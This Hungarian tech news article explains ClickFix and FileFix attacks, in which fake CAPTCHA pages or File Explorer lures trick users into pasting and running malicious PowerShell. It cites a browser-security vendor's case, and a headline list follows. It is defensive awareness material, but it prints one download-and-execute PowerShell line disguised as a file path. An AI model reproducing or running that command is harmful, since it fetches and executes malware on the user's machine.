2025. 08. 06., 09:14

Veszély a böngészőből: így trükköznek a ClickFix és FileFix támadásokkal!

Veszély a böngészőből: így trükköznek a ClickFix és FileFix támadásokkal!
Az utóbbi időszakban különösen veszélyes támadási módszer terjedt el az interneten, amelynek lényege, hogy ártalmatlannak tűnő weboldalakon keresztül vehetik rá a felhasználókat arra, hogy saját maguk futtassanak le káros kódokat a számítógépükön. Az átverés neve ClickFix, és az egészben az a legveszélyesebb, hogy a felhasználó szinte semmit sem vesz észre, miközben maga segíti hozzá a támadót a rendszer feltöréséhez.

Így működik a ClickFix: átverés egy kattintással

A ClickFix támadásoknál a támadók megtévesztő weboldalt hoznak létre, gyakran például hamis CAPTCHA-ellenőrzéssel. Ha valaki rákattint egy ilyen, látszólag problémát megoldani hivatott elemre, a weboldal észrevétlenül másol rosszindulatú kódot a felhasználó vágólapjára. Ezután felszólítják a felhasználót, hogy igazolja magát – tipikusan úgy, hogy a vágólap tartalmát illessze be a Windows Futtatás ablakába.

Lényeges, hogy a megtévesztett felhasználó ebben a pillanatban maga hajtja végre a támadók kódját a saját gépén, abban a hitben, hogy csak egy, az emberi mivoltát igazoló tesztet erősít meg. Ezzel a trükkel a támadók anélkül tudnak támadni, hogy bármilyen vírus áthágná az operációs rendszer védelmi vonalait – minden az emberi tényezőn múlik.

Valós példa: kattintás egy találatra, kártékony PowerShell a vágólapon

Egy valós céges példában az egyik felhasználó egy keresési találatot követve olyan oldalra tévedt, ahol a támadók már elhelyezték a káros JavaScript kódot. A clickfixes prompt felugrott, és ha nem lett volna aktív a Keep Aware böngészővédelmi rendszer, a felhasználó észrevétlenül másolta volna át a kártékony PowerShell-parancsot, majd futtatta volna azt.

Ezzel szemben a Keep Aware valós időben észlelte, blokkolta, és figyelmeztetett a gyanús kódfeltöltésre, így megelőzte a további fertőzést. Ha nem lép közbe a védelmi rendszer, a támadás a háttérben úgy zajlott volna le, hogy néhány fájlt letölt, lefordítja a kódot, beállítja a fenyegetést a Windows automatikus futtatásához – így minden bejelentkezéskor újraindul a kártevő.

Az ilyen trükkök célja általában káros programok telepítése: például távoli elérésű trójai (RAT), adatszivárogtató programok, illetve további kártevők – például NetSupport Manager, AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate kártevő vagy DanaBot stealer.

A következő szint: FileFix – már a fájlkezelő is veszélyes

A támadók azonban nem ülnek a babérjaikon; a ClickFix mellett megjelent a FileFix nevű „új generáció”, amelyet biztonsági kutatók idén júniusban fedeztek fel. A FileFix lényege, hogy a felhasználót ráveszi: egy, fájlútvonalnak látszó, de valójában PowerShell-parancsot tartalmazó sort illesszen be közvetlenül a Windows Fájlkezelő címsorába.

A trükk annyira jól álcázott, hogy első pillantásra teljesen ártatlan útvonalnak tűnik – például:
powershell.exe -c “iwr káros[.]webhely/mal.jpg|iex” # C:CégBelsőDrivePályázat.pdf
A komment mögé rejtett fájlútvonal eltereli a figyelmet, miközben a valós fenyegetés (a letöltött kártevő) már a háttérben aktiválódik.

Fontos, hogy a FileFix ugyanarra az elvre épül, mint a ClickFix: mindkettő a vágólap manipulálásához és ahhoz kéri a felhasználó segítségét, hogy maga hajtsa végre a futtatáshoz szükséges parancsokat a saját gépén. A fő különbség, hogy a FileFix a böngészőből átterjed a fájlkezelőre is.


A védekezés leghatékonyabb módja: böngészőalapú védelem

Ennek fényében világos, hogy a hagyományos vírusirtók és klasszikus IT-védelem gyakran vak a vágólap manipulációjára és a böngészőben megbúvó fenyegetésekre. Az ilyen támadások elleni védelem kulcsa, hogy már a böngészőben felismerjük a csalafinta vágólap-módosításokat, felhasználói interakciókat, és időben blokkoljuk a rossz szándékot.

A Keep Aware és más, böngészőbe épülő, valós idejű védelmi rendszerek képesek azonnal érzékelni a vágólap gyanús feltöltését, blokkolják a kódot, mielőtt az eljuthatna a Windows termináljáig vagy a Fájlkezelőhöz.

Fontos kiemelni, hogy napjaink munkavégzésének nagy része böngészőben történik – és a támadók pontosan ezt használják ki. Aki nem biztosítja megfelelően böngészőjét, az valójában az egész rendszerét kockára teszi.

Mi a tanulság?

A ClickFix és FileFix támadások megjelenése új szintre emelte a social engineering támadásokat: már nemcsak gyanús csatolmányokat kell kerülni, hanem szinte bármilyen weboldaltól, ártalmatlan felugró ablaktól vagy másolásra buzdító üzenettől is óvatosnak kell lenni. Lényeges, hogy a védelem nem csak az antivírusokon, hanem a böngésző belső szabályain és a felhasználói tudatosságon is múlik. Felhasználók és rendszergazdák számára egyszerű szabály: soha ne illesszen be, és ne futtasson le ismeretlen eredetű parancsokat – még akkor sem, ha az egy CAPTCHA-t vagy fájlútvonalat imitál.

2025, adminboss, www.bleepingcomputer.com alapján

  • Mit gondolsz, mennyire lehet megbízni egy ismeretlen weboldal üzenetében?
  • Te mit tettél volna, ha ilyen gyanús üzenetet kapsz, amit nem értesz teljesen?
  • Szerinted mennyire lehet etikus, ha a támadók ilyen trükkös módon próbálják meg átvágni az embereket?


Legfrissebb posztok

APP
MA 09:12

APPok, Amik Ingyenesek MA, 5/17

Fizetős iOS appok és játékok, amik ingyenesek a mai napon.     100 Plants – Grow & Learn (iPhone/iPad)A 100 Plants – Grow & Learn oktató alkalmazásban 100 különféle növényt lehet nevelni magtól virágzásig, öt fejlődési szakaszban (mag, csíra, levél, bimbó, virág)...

MA 09:01

A WHO globális vészhelyzetet hirdet a kongói ebola miatt – 80 haláleset

A Kongói Demokratikus Köztársaság és Uganda területén kitört ebola-járványt vasárnap nemzetközi jelentőségű egészségügyi vészhelyzetnek minősítette az Egészségügyi Világszervezet...

MA 08:55

A Forza Horizon 6 máris rekordot döntött, pedig még meg sem jelent

🏁 A Forza Horizon 6 még hivatalosan meg sem jelent, de már most népszerűbb, mint az előző, ötödik rész...

MA 08:28

Az MI-vel írók váltsanak pályát – üzeni Seth Rogen

💬 Felmerül a kérdés, hogy a hagyományos írás vagy az MI használata hordoz-e valódi kreativitást...

MA 08:18

A Survivor Görögország forgatását leállították: egy versenyző majdnem elvesztette a lábát

A Survivor – Görögország (Survivor Greece) forgatását azonnali hatállyal leállították, miután egy fiatal versenyző, Stavros Floros életveszélyes balesetet szenvedett...

MA 07:55

A veterán Final Fantasy XI 24 év után is tartogat újdonságokat

Több mint két évtizeddel a debütálása után a Final Fantasy XI továbbra is kitart az online szerepjátékok világában...

MA 07:37

Az üzleti vakfolt: az MI kiiktatja a saját tanítómestereit

A technológiai átalakulás új korszakát éljük, ahol a fejlett algoritmusok már nemcsak támogatják, hanem egyre inkább kiváltják azokat a szakértői feladatokat, amelyekben az embereknek fejlődniük kellene...

MA 07:28

A hivatalos Garfield-crossover végre megérkezett a Magic: The Gatheringbe

A világ talán leghíresebb macskája, Garfield végre hivatalosan is beköszön a Magic: The Gathering különkiadásai közé...

MA 07:19

Az érettségi ajándéklista: menő kütyük és kolis alapcuccok

Az iskolapadból az egyetemi életbe kilépni mindig izgalmas, egy jó ajándék pedig még könnyebbé teheti az átállást...

MA 07:02

A GameSir G8+ MFi végre kijavította az elődje hibáit?

A GameSir G8+ MFi jelentős előrelépés a mobil játékvezérlők világában, amely a G8 Galileo bevált tulajdonságait vette alapul, majd szinte minden kritikus ponton továbbfejlesztette azt...

MA 06:55

A Mixtape nem kerül le: a kiadó cáfolja a zenelicenc-pánikot

Kételyek merültek fel, hogy a nemrég megjelent, Mixtape című történetközpontú játék hamarosan eltűnhet a digitális boltokból a zeneszámok licencproblémái miatt...

MA 06:46

Az adatközpontok ára: 16 millió otthonnyi áram – ki nyer?

Hihetetlen, de mégis igaz, hogy az Egyesült Államokban működő adatközpontok évente annyi áramot fogyasztanak, amellyel több mint 16 millió otthon energiaigényét lehetne fedezni...

MA 06:37

A Microsoft AI-központja Kenyában az ország felét lekapcsolná

Kenya elképesztő technológiai ugrásra készült, amikor májusban bejelentették a G42 és a Microsoft közös, 1 milliárd dolláros adatközpont-beruházását...

MA 06:28

Az utolsó kör: jövő héten lekerül a LEGO 2K Drive

Csak három évvel a megjelenése után végleg eltűnik a digitális boltok polcairól a LEGO 2K Gyorsulás (LEGO 2K Drive), az a nyílt világú versenyjáték, ahol saját építésű járgányaiddal száguldozhatsz...

MA 06:19

Az egykori Valve-író a Half-Life 3-hoz hozzá sem nyúlna

😐 Ez a jelenség jól illusztrálható azzal, hogy ha egy alkotó bármilyen megjegyzést tesz egy legendás játék folytatásáról, az internetes rajongók azonnal az új rész bejelentését vizionálják...

MA 06:05

Történelmi események a mai napon (Május 17.)

Mi fűzte össze ezt a napot? Alkotmányok 📜, háborúk ⚔️ és történelmi első alkalmak 🚆 formálták a világot: Norvégia alkotmánya, a Boshin-háború lezárása, a Watergate-ügy nyilvános szenátusi meghallgatásai és az első legális azonos nemű házasságok mind ide kötődnek...

MA 06:01

A Swatchnál boltzár és zavargás egy nem limitált műanyag óráért

A Swatch új órakollekciójának megjelenése váratlan zavargásokat okozott több városban, emiatt több üzletnek ideiglenesen be kellett zárnia...

szombat 21:46

Az otthoni iroda trónja: gamer szék, ami mindent túlél

💪 Ami kezdetben ártalmatlannak tűnt, az utóbbi években jelentősen megváltozott: világszerte milliók home office-ba kényszerültek, ami alaposan átrajzolta, mit várunk el az irodabútortól...

szombat 21:01

Az Andes-vírus rejtett kockázatai: mi számít közeli kontaktusnak?

A közelmúltban egy tengerjáró hajón történt hantavírus-kitörés miatt jelenleg mintegy 150 utast figyelnek meg, illetve akár hathetes karanténba is helyeznek...

szombat 20:56

Az XRP lenyomta a Bitcoint, de a nagy ralihoz kell a Kongresszus

📈 Az XRP ára jelentősen megugrott, miután az amerikai szenátus bankügyi bizottsága előrelépést tett a Digital Asset Market Clarity Act ügyében...

szombat 20:46

A nyolcéves afroamerikai kisfiú rejtélye: fehér telepesek közé temetve Marylandben

🕵 Egy 17. századi marylandi temető különös titkot rejtett: egy mindössze nyolcéves fiú földi maradványait találták meg, aki túlnyomórészt afrikai származású volt...

szombat 20:34

Az agy rejtett tápanyaghiánya állhat a szorongás mögött

Az agyunk működése mögötti titkos összetevőkre újabb fény vetült: amerikai kutatók felfedezték, hogy a tartós szorongással élőknél kimutathatóan kevesebb található egy létfontosságú agyi tápanyagból, amelyet az emberek többsége amúgy is hiányosan visz be...

szombat 20:22

Az elszálló energia- és műtrágyaárak kétségbe ejtik a gazdákat

Felmerül a kérdés, meddig bírják még a mezőgazdasági termelők a folyamatosan növekvő költségeket...

szombat 20:12

A Google nem veszi el a 15 GB-ot – számot kér érte

💰 Az új Gmail-fiókok tulajdonosai néhány országban kellemetlen meglepetéssel szembesülnek: a megszokott 15 GB ingyenes tárhely helyett kezdetben csak 5 GB-ot kapnak...

szombat 20:01

A kriptós hozaméhség milliárdokat sodor hackerveszélybe

A decentralizált pénzügyek világa 2020-ban új alapokra helyezte a digitális pénzügyeket: közvetítők nélkül, globálisan elérhető rendszert ígért...

szombat 19:55

Az öregedés és krónikus betegségek mögött apró bélrészecskék rejtőzhetnek

🤒 Az öregedéssel és krónikus betegségekkel kapcsolatban egészen új tényezőt fedeztek fel a kutatók: a bélben képződő parányi részecskék, úgynevezett exoszómák is kulcsszerepet játszhatnak a szervezet gyulladásos folyamataiban...

szombat 19:34

A MercurySteam-nél zajló fájdalmas leépítések közepette érkezik a Blades of Fire Steamen

A Metroid Dread fejlesztőjeként ismert MercurySteam komoly változások elé néz: a stúdió kénytelen volt elbocsátásokat bejelenteni, miközben legújabb akciójátékuk, a God of War-hangulatú Blades of Fire végre Steamen is elérhetővé vált...

szombat 19:23

Az óceán mélyén felfedezett fékek állítják meg a hatalmas földrengéseket

Több mint 1600 kilométerrel Ecuador partjaitól nyugatra, a Csendes-óceán mélyén található Gofar-törésvonal már legalább harminc éve szinte óraműpontossággal produkál nagy, 6-os erősségű földrengéseket...

szombat 19:01

A szenzációs etióp ősmaradvány átírja az emberi eredet történetét

👑 A legújabb etiópiai leletek alaposan átírják, amit az emberi fejlődésről eddig tudtunk...